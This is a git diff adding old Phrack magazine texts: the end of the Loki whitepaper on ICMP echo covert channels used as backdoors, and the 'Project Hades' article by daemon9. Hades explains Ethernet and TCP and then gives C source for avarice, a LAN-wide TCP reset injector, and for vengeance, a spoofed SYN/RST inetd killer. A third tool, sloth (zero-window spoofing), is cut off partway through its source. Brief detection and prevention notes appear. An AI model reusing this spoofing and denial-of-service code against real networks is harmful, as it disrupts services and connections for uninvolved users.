+	Loki, Norse God of deceit and trickery, the 'Lord of Misrule' was 
+well known for his subversive behavior.  Inversion and reversal of all sorts 
+was typical for him.  Due to it's clandestine nature, we chose to name this 
+project after him.
+
+	The Loki Project consists of a whitepaper covering this covert channel
+in detail.  The sourcecode is not for distribution at this time.
+
+
+		--[ Overview  ]--
+
+
+	This whitepaper is intended as a complete description of the covert
+channel that exists in networks that allow ping traffic (hereon referred to 
+in the more general sense of ICMP_ECHO traffic --see below) to pass.  It is 
+organized into sections:
+
+	Section I.	ICMP Background Info and the Ping Program
+	Section II.	Basic Firewall Theory and Covert Channels
+	Section III.	The Loki Premise
+	Section IV.	Discussion, Detection, and Prevention
+	Section V.	References
+
+(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
+read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
+
+
+		Section I.	ICMP Background Info and the Ping Program
+
+
+	The Internet Control Message Protocol is an adjunct to the IP layer.
+It is a connectionless protocol used to convey error messages and other 
+information to unicast addresses.  ICMP packets are encapsulated inside of IP
+datagrams.  The first 4-bytes of the header are same for every ICMP message, 
+with the remainder of the header differing for different ICMP message types.
+There are 15 different types of ICMP messages.  
+
+	The ICMP types we are concerned with are type 0x0 and type 0x8.  
+ICMP type 0x0 specifies an ICMP_ECHOREPLY (the response) and type 
+0x8 indicates an ICMP_ECHO (the query).  The normal course of action is 
+for a type 0x8 to elicit a type 0x0 response from a listening server.  
+(Normally, this server is actually the OS kernel of the target host.  Most 
+ICMP traffic is, by default, handled by the kernel).  This is what the ping 
+program does.  
+
+	Ping sends one or more ICMP_ECHO packets to a host.  The purpose
+may just be to determine if a host is in fact alive (reachable).  ICMP_ECHO 
+packets also have the option to include a data section.  This data section 
+is used when the record route option is specified, or, the more common case, 
+(usually the default) to store timing information to determine round-trip 
+times.  (See the ping(8) man page for more information on these topics).  
+An excerpt from the ping man page:
+
+ "...An IP header without options is 20 bytes.  An ICMP ECHO_REQUEST packet
+     contains an additional 8 bytes worth of ICMP header followed by an 
+     arbitrary-amount of data.  When a packetsize is given, this indicated the
+     size of this extra piece of data (the default is 56).  Thus the amount of
+     data received inside of an IP packet of type ICMP ECHO_REPLY will always
+     be 8 bytes more than the requested data space (the ICMP header)..."
+
+	Although the payload is often timing information, there is no check by
+any device as to the content of the data.  So, as it turns out, this amount of 
+data can also be arbitrary in content as well.  Therein lies the covert 
+channel.
+
+
+		Section II.	Basic Firewall Theory and Covert Channels
+
+
+	The basic tenet of firewall theory is simple:  To shield one network
+from another.  This can be clarified further into 3 provisional rules:
+1. All traffic passing between the two networks must pass through the firewall.
+2. Only traffic authorized by the firewall may pass through (as dictated by 
+the security policy of the site it protects).
+3. The firewall itself is immune to compromise.	
+
+	A covert channel is a vessel in which information can pass, but this
+vessel is not ordinarily used for information exchange.  Therefore, as a 
+matter of consequence, covert channels are impossible to detect and deter 
+using a system's normal (read: unmodified) security policy.  In theory, 
+almost any process or bit of data can be a covert channel.  In practice, it 
+is usually quite difficult to elicit meaningful data from most covert 
+channels in a timely fashion.  In the case of Loki, however, it is quite 
+simple to exploit.
+
+	A firewall, in it's most basic sense, seeks to preserve the security 
+policy of the site it protects.  It does so by enforcing the 3 rules above.
+Covert channels, however, by very definition, are not subject to a site's 
+normal security policy.
+
+
+		Section III.	The Loki Premise
+
+
+	The concept of the Loki Project is simple: arbitrary information 
+tunneling in the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets.  Loki 
+exploits the covert channel that exists inside of ICMP_ECHO traffic.  This 
+channel exists because network devices do not filter the contents of ICMP_ECHO
+traffic.  They simply pass them, drop them, or return them. The trojan packets
+themselves are masqueraded as common ICMP_ECHO traffic.  We can encapsulate 
+(tunnel) any information we want.  From here on out, Loki traffic will refer 
+to ICMP_ECHO traffic that tunnels information.  (Astute readers will note that
+Loki is simply a form of steganography).
+
+	Loki is not a compromise tool.  It has many uses, none of which are 
+breaking into a machine.  It can be used as a backdoor into a system by 
+providing a covert method of getting commands executed on a target machine.
+It can be used as a way of clandestinely leeching information off of a 
+machine.  It can be used as a covert method of user-machine or user-user 
+communication.  In essence the channel is simply a way to secretly shuffle
+data (confidentiality and authenticity can be added by way of cryptography). 
+
+	Loki is touted as a firewall subversion technique, but in reality it
+is simple a vessel to covertly move data.  *Through* exactly what we move this
+data is not so much an issue, as long as it passes ICMP_ECHO traffic.  It does
+not matter: routers, firewalls, packet-filters, dual-homed hosts, etc...  all
+can serve as conduits for Loki.
+
+
+		Section IV.	Discussion, Detection and Prevention
+
+
+	If ICMP_ECHO traffic is allowed, then this channel exists.  If this 
+channel exists, then it is unbeatable for a backdoor (once the system is 
+compromised).  Even with extensive firewalling and packet-filtering 
+mechanisms in place, this channel continues to exist (provided, of course,
+they do not deny the passing of ICMP_ECHO traffic).  With a proper 
+implementation, the channel can go completely undetected for the duration of
+its existence.  
+
+	Detection can be difficult.  If you know what to look for, you may
+find that the channel is being used on your system.  However, knowing when
+to look, where to look, and the mere fact that you *should* be looking all
+have to be in place.  A surplus of ICMP_ECHOREPLY packets with a garbled
+payload can be ready indication the channel is in use.  The standalone Loki 
+server program can also be a dead give-away.  However, if the attacker can 
+keep traffic on the channel down to a minimum, and was to hide the Loki 
+server *inside* the kernel, detection suddenly becomes much more difficult.
+
+	Disruption of this channel is simply preventative.  Disallow ICMP_ECHO
+traffic entirely.  ICMP_ECHO traffic, when weighed against the security 
+liabilities it imposes, is simply not *that* necessary.  Restricting ICMP_ECHO
+traffic to be accepted from trusted hosts only is ludicrous with a 
+connectionless protocol such as ICMP.  Forged traffic can still reach the 
+target host.  The LOKI packet with a forged source IP address will arrive at 
+the target (and will elicit a legitimate ICMP_ECHOREPLY, which will 
+travel to the spoofed host, and will be subsequently dropped silently) and 
+can contain the 4-byte IP address of the desired target of the Loki response 
+packets, as well as 51-bytes of malevolent data...  While the possibility 
+exists for a smart packet filter to check the payload field and ensure that 
+it *only* contains legal information, such a filter for ICMP is not in wide 
+usage, and could still be open to fooling.  The only sure way to destroy this
+channel is to deny ALL ICMP_ECHO traffic into your network.
+
+NOTE: This channel exists in many other protocols.  Loki Simply covers 
+ICMP, but in theory (and practice) any protocol is vulnerable to covert 
+data tunneling.  All that is required is the ingenuity...
+
+		Section V.	References
+
+
+		Books:	TCP Illustrated vols. I, II, III
+		RFCs:	rfc 792
+		Source:	Loki v1.0
+		Ppl:	We did not pioneer this concept  To our knowledge, 
+		it was discovered independently of our efforts, prior to our
+		research.  This party wishes to remain aloof.
+
+
+This project made possible by a grant from the Guild Corporation.
+
+
+EOF
diff --git a/phrack49/7.txt b/phrack49/7.txt
new file mode 100644
index 0000000..8ac0060
--- /dev/null
+++ b/phrack49/7.txt
@@ -0,0 +1,1024 @@
+                             .oO Phrack Magazine Oo.
+
+                          Volume Seven, Issue Forty-Nine
+
+                                  File 07 of 16
+
+			        [ Project Hades ]
+
+		           Paper by daemon9 AKA route
+		              sourcecode by daemon9
+			       for Phrack Magazine
+		      October 1996 Guild Productions, kid
+
+	   		comments to route@infonexus.com
+
+
+		--[ Introduction ]--
+
+
+	More explorations of weaknesses in the most widely used transport
+protocol on the Internet.  Put your mind at rest fearful reader!  The 
+vulnerabilities outlined here are nowhere near the devastating nature of 
+Project Neptune/Poseidon.  
+
+	Hades is the Greek god of the underworld; his kingdom is that of the 
+the Dead.  Hades renown for being quite evil and twisted.  He is also well
+known for his TCP exploit code.  Therefore, it seemed fitting to name this
+project after him.
+
+	BTW, for this code to work (as with much of my previous code) your 
+kernel must be patched to be able to spoof packets.  DO NOT MAIL ME to ask how 
+to do it.
+
+
+		--[ Overview  ]--
+
+
+	Section I.	Ethernet background information	
+	Section II.	TCP background information
+	Section III.	Avarice
+	Section IV.	Vengeance
+	Section V.	Sloth
+	Section	VI.	Discussion, Detection, and Prevention
+
+(Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
+read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
+
+
+		Section I.	Ethernet Background information
+
+
+	Ethernet is a multi-drop, connectionless, unreliable link layer 
+protocol.  It (IEEE 802.3 Ethernet is the version I refer to) is the 
+link-layer protocol most LANs are based upon.  It is multidrop; each
+device on the ethernet shares the media (and, consequently, the bandwidth)
+with every other device.  It is connectionless; every frame is sent 
+independently of the previous one and next one.  It is unreliable; frames are 
+not acknowledged by the other end.  If a frame is received that doesn't pass 
+the checksum, it is silently discarded.  It is a link-layer protocol that sits
+underneath the network protocol (IP) and above the physical interface (varies,
+but often CAT3/5 UTP).
+
+
+                --[ Signaling and Encoding ]--
+		
+
+	Standard 802.3 Ethernet signals at 10 mega-bits per second using 
+Manchester encoding to order bits on the wire.  Manchester is a biphase 
+state-transition technique; to indicate a particular bit is on, a voltage 
+transition from low to high is used.  To indicate a bit is off, a high to low
+transition is used.  
+
+
+                --[ Media Access ]--
+
+
+	Ethernet uses media contention to gain access to the shared wire.  The
+version of contention it uses is CSMA/CD (carrier sense multiple access / 
+collision detection).  This simply means that ethernet supports multiple 
+devices on a shared network medium.  Any device can send it's data whenever
+it thinks the wire is clear.  Collisions are detected (causing back-off and
+retry) but not avoided.  CSMA/CD algorithmically:
+
+1. IF: 	 the medium is idle -> transmit.
+2. ELSE: the medium is busy -> wait and listen until idle -> transmit.
+3. IF:	 collision is detected -> transmit jamming signal, cease all 
+	 transmission
+4. IF:	 jamming signal is detected -> wait a random amount of time, goto 1
+	
+
+		--[ Broadcast Medium ]--
+
+
+	Since it is CSMA/CD technology, ethernet has the wonderful property
+that it hears everything on the network.  Under normal circumstances, an
+ethernet NIC will only capture and pass to the network layer packets that 
+boast it's own MAC (link-layer) address or a broadcast MAC address.  However, 
+it is trivial to place an Ethernet card into promiscuous mode where it will
+capture everything it hears, regardless to whom the frame was addressed.
+
+	It bears mentioning that bridges are used to divide an ethernet into
+logically separate segments.  A bridge (or bridging device such as a smart 
+hub) will not pass an ethernet frame from segment to segment unless the 
+addressed host lies on the disparate segment.  This can reduce over-all 
+network load by reducing the amount of traffic on the wire.
+
+
+                Section II.      TCP Background Information
+
+
+        TCP is a connection-oriented, reliable transport protocol.  TCP is
+responsible for hiding network intricacies from the upper layers.  A 
+connection-oriented protocol implies that the two hosts participating in a 
+discussion must first establish a connection before data may be exchanged.  In
+TCP's case, this is done with the three-way handshake.  Reliability can be 
+provided in a number of ways, but the only two we are concerned with are data 
+sequencing and acknowledgment.  TCP assigns sequence numbers to every byte in
+every segment and acknowledges all data bytes received from the other end.  
+(ACK's consume a sequence number, but are not themselves ACK'd.  That would be
+ludicrous.)  
+
+
+                --[ TCP Connection Establishment ]--
+
+
+        In order to exchange data using TCP, hosts must establish a connection.
+TCP establishes a connection in a 3 step process called the 3-way handshake.
+If machine A is running a client program and wishes to connect to a server
+program on machine B, the process is as follows:
+
+                        fig(1)
+       
+        1       A       ---SYN--->      B       
+
+        2       A    <---SYN/ACK---     B
+
+        3       A       ---ACK--->      B
+
+                                
+        At (1) the client is telling the server that it wants a connection.
+This is the SYN flag's only purpose.  The client is telling the server that 
+the sequence number field is valid, and should be checked.  The client will 
+set the sequence number field in the TCP header to it's ISN (initial sequence
+number).  The server, upon receiving this segment (2) will respond with it's 
+own ISN (therefore the SYN flag is on) and an Acknowledgment of the clients 
+first segment (which is the client's ISN+1).  The client then ACK's the 
+server's ISN (3).  Now data transfer may take place.
+
+
+              --[ TCP Control Flags  ]--
+
+
+        There are six TCP control flags. 
+
+SYN:   Synchronize Sequence Numbers
+        The synchronize sequence numbers field is valid.  This flag is only 
+valid during the 3-way handshake.  It tells the receiving TCP to check the 
+sequence number field, and note it's value as the connection-initiator's 
+(usually the client) initial sequence number.  TCP sequence numbers can 
+simply be thought of as 32-bit counters.  They range from 0 to 4,294,967,295.
+Every byte of data exchanged across a TCP connection (along with certain 
+flags) is sequenced.  The sequence number field in the TCP header will contain
+the sequence number of the *first* byte of data in the TCP segment.  
+
+ACK:   Acknowledgment
+        The acknowledgment number field is valid.  This flag is almost always
+set.   The acknowledgment number field in the TCP header holds the value of 
+the next *expected* sequence number (from the other side), and also 
+acknowledges *all* data (from the other side) up through this ACK number minus
+one.
+
+RST:   Reset
+        Destroy the referenced connection.  All memory structures are torn 
+down.
+
+URG:    Urgent 
+        The urgent pointer is valid.  This is TCP's way of implementing out
+of band (OOB) data.  For instance, in a telnet connection a `ctrl-c` on the 
+client side is considered urgent and will cause this flag to be set. 
+
+PSH:    Push
+        The receiving TCP should not queue this data, but rather pass it to 
+the application as soon as possible.  This flag should always be set in 
+interactive connections, such as telnet and rlogin.
+
+FIN:    Finish 
+        The sending TCP is finished transmitting data, but is still open to 
+accepting data.
+
+
+                --[ Ports ]--
+
+       
+        To grant simultaneous access to the TCP module, TCP provides a user 
+interface called a port.  Ports are used by the kernel to identify network 
+processes.  They are strictly transport layer entities.  Together with an 
+IP address, a TCP port provides an endpoint for network communications.  In 
+fact, at any given moment *all* Internet connections can be described by 4 
+numbers: the source IP address and source port and the destination IP 
+address and destination port.  Servers are bound to 'well-known' ports so 
+that they may be located on a standard port on different systems.  
+For example, the telnet daemon sits on TCP port 23.
+        
+
+		Section III.	Avarice
+	
+
+	Avarice is a SYN,RST generator.  It is designed to disallow any
+TCP traffic on the ethernet segment upon which it listens.  It works by
+listening for the 3-way handshake procedure to begin, and then immediately 
+resetting it.  The result is that no TCP based connections can be negotiated, 
+and therefore no TCP traffic can flow.  This version sits on a host, puts the 
+NIC into promiscuous mode and listens for connection-establishment requests.
+When it hears one, it immediately generates a forged RST packet and sends it 
+back to the client.  If the forged RST arrives in time, the client will quit 
+with a message like:
+
+	telnet: Unable to connect to remote host: Connection refused
+
+For the client to accept the RST, it must think it is an actual response from
+the server.  This requires 3 pieces of information: IP address, TCP port, and 
+TCP acknowledgment number.  All of this information is gleaned from the 
+original SYN packet:  the IP address of the destination host, the TCP port 
+of the listening process, and the clients ISN (the acknowledgment number in 
+the RST packet is the clients ISN+1, as SYN's consume a sequence number).
+
+	This program has a wide range of effectiveness.  Speed is essential
+for avarice to quell all TCP traffic on a segment.  We are basically racing 
+the kernel.  OS kernels tend to be rather efficient at building packets.  If 
+run on a fast machine, with a fast kernel, it's kill rate is rather high.  
+I have seen kill-rates as high as 98% (occasionally a few slip through) on 
+a fast machine.  Consequently, if run on a slow machine, with a slow kernel, it
+will likely be useless.  If the RSTs arrive too late, they will be dropped by 
+the client, as the ACK number will be too low for the referenced connection.  
+Sure, the program could send, say, 10 packets, each with progressively higher 
+ACK numbers, but hey, this is a lame program...
+
+
+		Section IV.	Vengeance
+
+
+	Vengeance is an inetd killer.  On affected systems this program will
+cause inetd to become unstable and die after the next connection attempt.
+It sends a connection-request immediately followed by a RST to an internal 
+inetd managed service, such as time or daytime.  Inetd is now unstable and
+will die after the next attempt at a connection.  Simple.  Dumb.  Not eleet.
+(This inetd bug should be fixed or simply not present in newer inetd code.) 
+
+	I did not add code to make the legitimate connection that would kill
+inetd to this simple little program for 2 reasons.  1) It's simply not worth 
+the complexity to add sequence number prediction to create a spoofed 3-way 
+handshake.  This program is too dinky.  2) Maybe the attacker would want 
+to leave inetd in a unstable state and let some legitimate user come along and
+kill it.  Who knows.  Who cares.  Blah.  I wash my hands of the whole affair.
+
+
+		Section V.	Sloth
+
+
+	"Make your ethernet feel like a lagged 28.8 modem link!"
+
+	Sloth is an experiment.  It is an experiment in just how lame IP 
+spoofing can get.  It works much the same way avarice does, except it sends 
+forged TCP window advertisements.  By default Sloth will spoof zero-size 
+window advertisements which will have the effect of slowing interactive 
+traffic considerably.  In fact, in some instances, it will freeze a 
+connection all together.  This is because when a TCP receives a zero-size 
+window advertisement, it will stop sending data, and start sending window 
+probes (a window probe is nothing more than an ACK with one byte of 
+data) to see if the window size has increased.  Since window probes are, in 
+essence, nothing more than acknowledgements, they can get lost.  Because of 
+this fact, TCP implements a timer to cordinate the repeated sending of these 
+packets.  Window probes are sent according to the persist timer (a 500ms 
+timer) which is calculated by TCP's exponential backoff algorithm.  Sloth 
+will see each window probe, and spoof a 0-size window to the sender.  This 
+all works out to cause mass mayhem, and makes it difficult for either TCP to 
+carry on a legitimate conversation.  
+
+	Sloth, like avarice, is only effective on faster machines.  It also
+only works well with interactive traffic.
+
+		
+		Section	VI.	Discussion, Detection, and Prevention
+
+
+	Avarice is simply a nasty program.  What more do you want from me?
+Detection?  Detection would require an ounce of clue.  Do FTP, SMTP, HTTP, 
+POP, telnet, etc all suddenly break at the same time on every machine on 
+the LAN?  Could be this program.  Break out the sniffer.  Monitor the network 
+and look for the machine that generating the RSTs.  This version of the program
+does not spoof its MAC address, so look for that.  To really prevent this 
+attack, add cryptographic authentication to the TCP kernels on your machines.
+
+	Vengeance is a wake-up call.  If you haven't patched your inetd to be
+resistant to this attack, you should now.  If your vendor hasn't been 
+forthcoming with a patch, they should now.  Detection is using this 
+program.  Prevention is a patch.  Prevention is disabling the internal inetd 
+services.
+
+	Sloth can be detected and dealt with in much the same way as avarice.
+
+	You may have noticed that these programs are named after three of
+the Seven Deadly Sins.  You may be wondering if that implies that there will 
+be four more programs of similar ilk.  Well, STOP WONDERING.  The answer is 
+NO.  I am officially *out* of the D.O.S. business.  I am now putting my efforts
+towards more productive ventures.  Next issue, a session jacker.
+
+
+This project made possible by a grant from the Guild Corporation.
+
+
+-------------------------------8<-------cut-me-loose--------------------------
+
+
+/*
+                            The Hades Project
+		    Explorations in the Weakness of TCP
+			   SYN -> RST generator
+			        (avarice)
+                                 v. 1.0
+
+                        daemon9/route/infinity
+
+                     October 1996 Guild productions
+
+                     comments to route@infonexus.com
+
+
+   This coding project made possible by a grant from the Guild corporation
+
+*/
+
+#include "lnw.h"
+
+void main(){
+
+	void reset(struct iphdr *,struct tcphdr *,int);
+
+	struct epack{				/* Generic Ethernet packet w/o data payload */
+		struct ethhdr eth;		/* Ethernet Header */
+		struct iphdr ip;		/* IP header */
+		struct tcphdr tcp;		/* TCP header */
+	}epack;
+
+	int sock,shoe,dlen;
+	struct sockaddr dest;
+	struct iphdr  *iphp;
+	struct tcphdr *tcphp;
+
+	if(geteuid()||getuid()){
+                fprintf(stderr,"UID or EUID of 0 needed...\n");
+                exit(0);
+        }
+	sock=tap(DEVICE);		/* Setup the socket and device */
+
+				/* Could use the SOCK_PACKET but building Ethernet headers would
+				 require more time overhead; the kernel can do it quicker then me */
+	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
+                perror("\nHmmm.... socket problems");
+                exit(1);
+        }  
+	shadow();			/* Run as a daemon */ 
+	
+	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
+  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   
+
+   	/* Network reading loop / RSTing portion */
+	while(1)if(recvfrom(sock,&epack,sizeof(epack),0,&dest,&dlen))if(iphp->protocol==IPPROTO_TCP&&tcphp->syn)reset(iphp,tcphp,shoe);
+}
+
+
+/*
+ *	Build a packet and send it off.
+ */
+
+void reset(iphp,tcphp,shoe)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+int shoe;
+{
+   	
+	void dump(struct iphdr *,struct tcphdr *);
+        
+        struct tpack{			/* Generic TCP packet w/o payload */
+                struct iphdr ip;	
+                struct tcphdr tcp;
+        }tpack;                
+        
+        struct pseudo_header{           /* For TCP header checksum */
+                unsigned source_address;
+                unsigned dest_address;
+                unsigned char placeholder;
+                unsigned char protocol;
+                unsigned short tcp_length;
+                struct tcphdr tcp;
+        }pheader;
+  
+   	struct sockaddr_in sin;         /* IP address information */
+                        		/* Setup the sin struct with addressing information */
+      	sin.sin_family=AF_INET;  	/* Internet address family */
+        sin.sin_port=tcphp->dest;       /* Source port */
+        sin.sin_addr.s_addr=iphp->saddr;/* Dest. address */
+
+                        /* Packet assembly begins here */
+        
+                                /* Fill in all the TCP header information */
+
+        tpack.tcp.source=tcphp->dest;   /* 16-bit Source port number */
+        tpack.tcp.dest=tcphp->source;   /* 16-bit Destination port */
+        tpack.tcp.seq=0;        	/* 32-bit Sequence Number */
+        tpack.tcp.ack_seq=htonl(ntohl(tcphp->seq)+1);    /* 32-bit Acknowledgement Number */
+        tpack.tcp.doff=5;              	/* Data offset */
+        tpack.tcp.res1=0;              	/* reserved */
+        tpack.tcp.res2=0;              	/* reserved */
+      	tpack.tcp.urg=0;               	/* Urgent offset valid flag */
+        tpack.tcp.ack=1;               	/* Acknowledgement field valid flag */
+        tpack.tcp.psh=0;               	/* Push flag */
+        tpack.tcp.rst=1;               	/* Reset flag */
+        tpack.tcp.syn=0;               	/* Synchronize sequence numbers flag */
+        tpack.tcp.fin=0;               	/* Finish sending flag */
+        tpack.tcp.window=0;	 	/* 16-bit Window size */
+        tpack.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
+        tpack.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
+        
+                                /* Fill in all the IP header information */
+        
+        tpack.ip.version=4;            	/* 4-bit Version */
+        tpack.ip.ihl=5;                	/* 4-bit Header Length */
+        tpack.ip.tos=0;                	/* 8-bit Type of service */
+    	tpack.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
+        tpack.ip.id=0;         		/* 16-bit ID field */
+        tpack.ip.frag_off=0;           	/* 13-bit Fragment offset */
+        tpack.ip.ttl=64;	        /* 8-bit Time To Live */
+        tpack.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
+        tpack.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
+        tpack.ip.saddr=iphp->daddr;    	/* 32-bit Source Address */
+        tpack.ip.daddr=iphp->saddr;    	/* 32-bit Destination Address */
+        
+        pheader.source_address=(unsigned)tpack.ip.saddr;
+        pheader.dest_address=(unsigned)tpack.ip.daddr;
+        pheader.placeholder=0;
+     	pheader.protocol=IPPROTO_TCP;
+        pheader.tcp_length=htons(TCPHDR);
+        
+     			/* IP header checksum */
+        
+      	tpack.ip.check=in_cksum((unsigned short *)&tpack.ip,IPHDR);
+                
+			/* TCP header checksum */
+                                
+        bcopy((char *)&tpack.tcp,(char *)&pheader.tcp,TCPHDR);
+       	tpack.tcp.check=in_cksum((unsigned short *)&pheader,TCPHDR+12);
+
+	sendto(shoe,&tpack,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
+#ifndef QUIET
+	dump(iphp,tcphp);
+#endif
+}
+
+/* 
+ *	Dumps some info...
+ */
+
+void dump(iphp,tcphp)
+struct iphdr *iphp;
+struct tcphdr *tcphp;
+{
+	fprintf(stdout,"Connection-establishment Attempt: ");
+   	fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest)); 
+	fprintf(stdout,"Thwarting...\n");
+}
+
+-------------------------------8<-------cut-me-loose--------------------------
+
+/*
+                            The Hades Project
+                    Explorations in the Weakness of TCP
+                              Inetd Killer
+			       (vengance)
+                                 v. 1.0
+
+                        daemon9/route/infinity
+
+                     October 1996 Guild productions
+
+                     comments to route@infonexus.com
+
+
+   This coding project made possible by a grant from the Guild corporation
+*/
+
+
+#include "lnw.h"
+
+void main()
+{
+
+	void s3nd(int,int,unsigned,unsigned short,unsigned);
+	void usage(char *);
+	unsigned nameResolve(char *);	
+
+	int sock,mode,i=0;
+	char buf[BUFSIZE];
+	unsigned short port;
+	unsigned target=0,source=0;
+     	char werd[]={"\n\n\n\nHades is a Guild Corporation Production.  c.1996\n\n"}; 
+
+	if(geteuid()||getuid()){
+                fprintf(stderr,"UID or EUID of 0 needed...\n");
+                exit(0);
+        }
+
+	if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
+                perror("\nHmmm.... socket problems");
+                exit(1);
+        }  
+
+	printf(werd);
+
+	printf("\nEnter target address-> ");
+        fgets(buf,sizeof(buf)-1,stdin);
+	if(!buf[1])exit(0);
+        while(buf[i]!='\n')i++;                 /* Strip the newline */
+        buf[i]=0;
+	target=nameResolve(buf);
+        bzero((char *)buf,sizeof(buf));
+
+	printf("\nEnter source address to spoof-> ");
+        fgets(buf,sizeof(buf)-1,stdin);
+	if(!buf[1])exit(0);        
+	while(buf[i]!='\n')i++;                 /* Strip the newline */
+        buf[i]=0;
+	source=nameResolve(buf);
+        bzero((char *)buf,sizeof(buf));
+
+	printf("\nEnter target port (should be 13, 37, or some internal service)-> ");
+        fgets(buf,sizeof(buf)-1,stdin);
+        if(!buf[1])exit(0);
+	port=(unsigned short)atoi(buf);
+    
+	fprintf(stderr,"Attempting to upset inetd...\n\n");
+
+	s3nd(sock,0,target,port,source);	/* SYN */
+	s3nd(sock,1,target,port,source);	/* RST */
+
+	fprintf(stderr,"At this point, if the host is vulnerable, inetd is unstable.\nTo verfiy: `telnet target.com {internal service port #}`.  Do this twice.\nInetd should allow the first connection, but send no data, then die.\nThe second telnet will verify t
+
+
+
+
+
+
+
+his.\n"); 
+}
+
+/*
+ *	Build a packet and send it off.
+ */
+
+void s3nd(int sock,int mode,unsigned target,unsigned short port,unsigned source){
+   	
+        struct pkt{
+                struct iphdr ip;
+                struct tcphdr tcp;
+        }packet;                
+        
+        struct pseudo_header{           /* For TCP header checksum */
+                unsigned source_address;
+                unsigned dest_address;
+                unsigned char placeholder;
+                unsigned char protocol;
+                unsigned short tcp_length;
+                struct tcphdr tcp;
+        }pseudo_header;
+  
+   	struct sockaddr_in sin;         /* IP address information */
+                        		/* Setup the sin struct with addressing information */
+      	sin.sin_family=AF_INET;  	/* Internet address family */
+        sin.sin_port=666;       	/* Source port */
+        sin.sin_addr.s_addr=target;  	/* Dest. address */
+
+                        /* Packet assembly begins here */
+        
+                                /* Fill in all the TCP header information */
+        
+        packet.tcp.source=htons(666);        	/* 16-bit Source port number */
+        packet.tcp.dest=htons(port);   		/* 16-bit Destination port */
+        if(mode)packet.tcp.seq=0;        	/* 32-bit Sequence Number */
+        else packet.tcp.seq=htonl(10241024);
+	if(!mode)packet.tcp.ack_seq=0;    	/* 32-bit Acknowledgement Number */
+	else packet.tcp.ack_seq=htonl(102410000);
+        packet.tcp.doff=5;              	/* Data offset */
+        packet.tcp.res1=0;              	/* reserved */
+        packet.tcp.res2=0;              	/* reserved */
+      	packet.tcp.urg=0;               	/* Urgent offset valid flag */
+        packet.tcp.ack=0;               	/* Acknowledgement field valid flag */
+        packet.tcp.psh=0;               	/* Push flag */
+        if(!mode)packet.tcp.rst=0;               /* Reset flag */
+        else packet.tcp.rst=1;
+	if(!mode)packet.tcp.syn=1;               /* Synchronize sequence numbers flag */
+	else packet.tcp.syn=0;
+        packet.tcp.fin=0;               	/* Finish sending flag */
+        packet.tcp.window=htons(512);	 	/* 16-bit Window size */
+        packet.tcp.check=0;             	/* 16-bit checksum (to be filled in below) */
+        packet.tcp.urg_ptr=0;           	/* 16-bit urgent offset */
+        
+                                /* Fill in all the IP header information */
+        
+        packet.ip.version=4;            	/* 4-bit Version */
+        packet.ip.ihl=5;                	/* 4-bit Header Length */
+        packet.ip.tos=0;                	/* 8-bit Type of service */
+    	packet.ip.tot_len=htons(IPHDR+TCPHDR);  /* 16-bit Total length */
+        packet.ip.id=0;         		/* 16-bit ID field */
+        packet.ip.frag_off=0;           	/* 13-bit Fragment offset */
+        packet.ip.ttl=64;	              	/* 8-bit Time To Live */
+        packet.ip.protocol=IPPROTO_TCP; 	/* 8-bit Protocol */
+        packet.ip.check=0;              	/* 16-bit Header checksum (filled in below) */
+        packet.ip.saddr=source;           /* 32-bit Source Address */
+        packet.ip.daddr=target;           /* 32-bit Destination Address */
+        
+        pseudo_header.source_address=(unsigned)packet.ip.saddr;
+        pseudo_header.dest_address=(unsigned)packet.ip.daddr;
+        pseudo_header.placeholder=0;
+     	pseudo_header.protocol=IPPROTO_TCP;
+        pseudo_header.tcp_length=htons(TCPHDR);
+        
+     			/* IP header checksum */
+        
+      	packet.ip.check=in_cksum((unsigned short *)&packet.ip,IPHDR);
+                
+			/* TCP header checksum */
+                                
+        bcopy((char *)&packet.tcp,(char *)&pseudo_header.tcp,IPHDR);
+       	packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,TCPHDR+12);
+
+	sendto(sock,&packet,IPHDR+TCPHDR,0,(struct sockaddr *)&sin,sizeof(sin));
+}
+
+-------------------------------8<-------cut-me-loose--------------------------
+
+/*
+                            The Hades Project
+                    Explorations in the Weakness of TCP
+                          TCP Window Starvation
+                                 (sloth)
+                                 v. 1.0
+
+                        daemon9/route/infinity
+
+                     October 1996 Guild productions
+
+                     comments to route@infonexus.com
+
+
+   This coding project made possible by a grant from the Guild corporation
+
+*/
+
+
+#include "lnw.h"
+
+	/* experiment with this value.  Different things happen with different sizes */
+
+#define SLOTHWINDOW	0
+
+void main(){
+
+	void sl0th(struct iphdr *,struct tcphdr *,int);
+
+	struct epack{				/* Generic Ethernet packet w/o data payload */
+		struct ethhdr eth;		/* Ethernet Header */
+		struct iphdr ip;		/* IP header */
+		struct tcphdr tcp;		/* TCP header */
+	}epack;
+
+	int sock,shoe,dlen;
+	struct sockaddr dest;
+	struct iphdr  *iphp;
+	struct tcphdr *tcphp;
+
+	if(geteuid()||getuid()){
+                fprintf(stderr,"UID or EUID of 0 needed...\n");
+                exit(0);
+        }
+	sock=tap(DEVICE);		/* Setup the socket and device */
+
+				/* Could use the SOCK_PACKET but building Ethernet headers would
+				 require more time overhead; the kernel can do it quicker then me */
+	if((shoe=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){
+                perror("\nHmmm.... socket problems");
+                exit(1);
+        }  
+	shadow();			/* Run as a daemon */	
+
+	iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);
+  	tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);   
+
